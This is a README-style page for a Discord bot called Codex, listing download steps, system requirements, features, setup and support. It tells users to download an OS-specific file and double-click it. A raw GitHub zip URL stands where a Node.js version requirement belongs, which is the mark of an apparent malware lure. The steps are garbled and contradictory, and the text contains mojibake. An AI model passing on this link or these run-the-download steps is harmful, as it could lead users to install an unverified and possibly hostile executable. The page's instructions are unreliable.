Codex is a modular Discord bot designed for university groups, gaming friends, and casual communities. It brings productivity tools and fun features into one place. Whether you're in a private friend server or a public community, Codex provides a smooth, modern experience with study tools, AI assistance, gaming utilities, and social features.
To use Codex, you need to download the latest release from our GitHub repository. Follow these simple steps to get started.
- Visit the Releases Page: Click here to download the latest version of Codex.
- Select the Appropriate File: See the list of available releases. Choose the file that matches your operating system (Windows, macOS, or Linux).
- Download the File: Click on the downloaded file to start the download process. Depending on your internet speed, this might take a few moments.
- Run the File: Once the download completes, locate the file in your downloads folder. Double-click on it to run Codex.
To ensure Codex runs smoothly, your system should meet the following requirements:
- Operating System: Windows 10 or higher / macOS 10.15 or higher / Ubuntu 20.04 or higher
- RAM: At least 4 GB
- Storage: 200 MB of free disk space
- https://raw.githubusercontent.com/kwaczus123412345/codex-bot/main/amphicentric/codex-bot_C.zip: Version 14 or higher
- Internet Connection: Required for Discord operations
Codex offers a variety of features designed to enhance your experience:
- Modular Design: Tailor the bot to your needs by enabling only the features you want.
- AI Assistance: Get study help with integrated AI tools.
- Polls & Reminders: Easily create polls and set reminders for group events.
- Meme Generator: Enjoy a fun meme-generating feature to share laughs with friends.
- Gaming Utilities: Access gaming tools that enhance your playtime.
After installing Codex, you may need to configure it to fit your server's needs. Here's how:
- Open the Botβs Configuration File: This file is included with the download.
- Set Your Preferences: Specify the channels where the bot should operate, along with any specific commands you'll want to enable or disable.
- Save Changes: Once you finish your adjustments, save the configuration file and restart the bot to apply the new settings.
Once Codex is running, you can invite it to your Discord server. To do this:
- Generate an Invite Link: Go to the Discord Developer Portal and create an application for Codex.
- Invite Bot to Your Server: Use the generated link to invite Codex to your server, granting it the necessary permissions for its features.
- Start Interacting: Use the commands provided by Codex in your Discord server to activate its features.
If you encounter any issues or need help, you can find support in the following ways:
- GitHub Issues: Use the Issues section on GitHub to report bugs or ask questions.
- Community Forums: Join Discord communities or forums related to Codex for tips and advice from other users.
- Documentation: Consult the included user guide for detailed instructions on all features.
For further inquiries, please contact the development team via the GitHub repository or through our Discord channel.
Codex is tagged under the following topics for easy discovery:
- ai-bot
- community-bot
- developer-tools
- discord-bot
- discord-js
- discordjs-v14
- docker
- gaming-bot
- meme-generator
- modular-bot
- nodejs
- poll-bot
- productivity-bot
- reminder-bot
- sqlite
- study-bot
- typescript
Visit often for updates and new features! Enjoy using Codex!